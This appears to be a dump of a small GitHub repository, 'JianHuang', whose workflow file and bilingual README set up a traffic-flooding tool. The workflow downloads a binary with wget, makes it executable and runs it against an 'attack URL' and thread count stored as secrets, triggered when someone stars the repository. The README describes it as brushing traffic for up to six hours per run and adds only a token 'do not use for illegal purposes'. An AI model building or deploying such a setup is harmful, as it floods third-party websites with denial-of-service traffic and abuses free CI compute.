Repository: lem0nb/jianhuang Branch: master Commit: d847659c196e Files: 3 Total size: 1.1 KB Directory structure: gitextract_ege6f38d/ ├── .github/ │ └── workflows/ │ └── jh.yml ├── README.md └── webBenchmark_linux_x64 ================================================ FILE CONTENTS ================================================ ================================================ FILE: .github/workflows/jh.yml ================================================ name: 'JianHuang' on: # push: watch: types: started jobs: Run: runs-on: ubuntu-latest steps: - name: 'Ready' run: | wget https://github.com/lem0nb/jianhuang/raw/master/webBenchmark_linux_x64 -O jh chmod +x jh - name: 'Start JianHuang' run: | ./jh -c ${{ secrets.XC }} -s ${{ secrets.URL }} ================================================ FILE: README.md ================================================ # JianHuang English | [Zh-cn](#JianHuang-1) GitHub action Jiang Huang (brush traffic) longest executable 6hour, support setting attack URL and thread # Usage Method Add Secrets Name | Value URL | attack URL XC | Number of threads Click star to start execution # Troubleshooting Q: What if you click star and do not execute it? A: Edit.github/workflows/ jh.yml Add a space at the end and submit to save # statement Do not use for illegal purposes . . . . . . # JianHuang [English](#JianHuang) | Zh-cn Github Action JianHuang 剑皇(刷流量) 最长可执行6HOUR 支持设定攻击URL和线程 # 使用方法 添加Secrets Name | Value URL | 攻击URL XC | 线程数 点击STAR开始执行 # 疑难解答 Q:点击Star不执行怎么办? A:编辑.github/workflows/jh.yml 在末尾随便添加空格 然后提交保存 ……… # 声明 请勿用于非法用途